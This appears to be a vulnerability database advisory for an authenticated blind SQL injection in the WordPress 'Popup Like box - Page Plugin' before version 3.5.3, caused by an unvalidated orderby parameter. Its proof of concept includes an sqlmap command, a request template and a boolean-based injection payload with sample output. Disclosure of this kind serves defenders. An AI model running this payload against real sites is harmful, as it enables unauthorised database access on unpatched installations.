Lucene search

K
wpvulndbDuongtqWPVDB-ID:9C0164F2-464B-4876-A48F-C0EBD63CF397
HistoryJun 29, 2021 - 12:00 a.m.

Popup Like box - Page Plugin < 3.5.3 - Authenticated Blind SQL Injections

2021-06-2900:00:00
duongtq
wpscan.com
8

0.001 Low

EPSS

Percentile

37.8%

The get_fb_likeboxes() function in the plugin did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard

PoC

SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs With r.txt is GET OR POST requests to sort item in plugin Menu. GET /wp-admin/admin.php?page=…&orderby;=id–&order;=desc HTTP/1.1 Host: … User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: … Upgrade-Insecure-Requests: 1 SQLMAP OUTPUT: -– Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=…&orderby;=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order;=asc -– [22:38:25] [INFO] testing MySQL [22:38:25] [INFO] confirming MySQL [22:38:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 8.0.0

CPENameOperatorVersion
ays-facebook-popup-likeboxlt3.5.3

0.001 Low

EPSS

Percentile

37.8%

Related for WPVDB-ID:9C0164F2-464B-4876-A48F-C0EBD63CF397